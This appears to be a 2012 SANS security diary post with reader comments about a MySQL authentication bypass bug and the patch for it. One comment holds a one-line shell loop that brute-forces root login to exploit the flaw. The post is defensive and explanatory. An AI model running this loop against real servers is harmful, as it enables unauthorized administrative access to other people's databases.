Exploit Available for Trivial MySQL Password Bypass

Published: 2012-06-11
Last Updated: 2012-06-11 13:22:10 UTC
by Johannes Ullrich (Version: 1)
5 comment(s)

Thanks to Jack for pointing this one out to us. I somehow missed this vulnerability this weekend.

MySQL fixed last week an authentication bypass vulnerability that is trivially exploitable [1]. The effect is that a user has a 1/256 chance of being granted access to MySQL even if the password is wrong. So in short: Brute forcing passwords will always work pretty quickly even if you got the wrong password.

The vulnerability does however depend on how your instance of MySQL was compiled. Chances are that you are not vulnerable, but just in case, there is a patch available, and it shouldn't be too hard to test. Write a script that attempts the same password many  times, and see if you get logged after a while. 

As an additional hardening measure, you may want to consider limiting access by IP address. 

[1] http://seclists.org/oss-sec/2012/q2/493

Johannes B. Ullrich, Ph.D.
SANS Technology Institute

Keywords: mysql
5 comment(s)


Exploit code is
while true; do mysql -uroot -pasdf mysql; done
using a valid user

but it did not work on my debian 6 64bit systems, none of them.
yup. Usually I don't like to link to exploit code, or have exploit code in comments like yours. But in this case, "hiding exploit code" would be silly ;-)

This page describes the problem / exploit pretty well, but basically a LOT of systems should be vulneable to this, and this gives MYSQL admin access - I'd expect to see widespread scanning.



You are not wrong, my IDS is already picking up a larger number of MySQL scans than usual...

It begins.

From vulnerability quote:

Whether a particular build of MySQL or MariaDB is vulnerable, depends on
how and where it was built. A prerequisite is a memcmp() that can return
an arbitrary integer (outside of -128..127 range). To my knowledge gcc
builtin memcmp is safe, BSD libc memcmp is safe. Linux glibc
sse-optimized memcmp is not safe, but gcc usually uses the inlined
builtin version.

Doesnt work, on any of the 6 mysqls servers I administer. (Debian, Ubuntu server, CentOS)

Diary Archives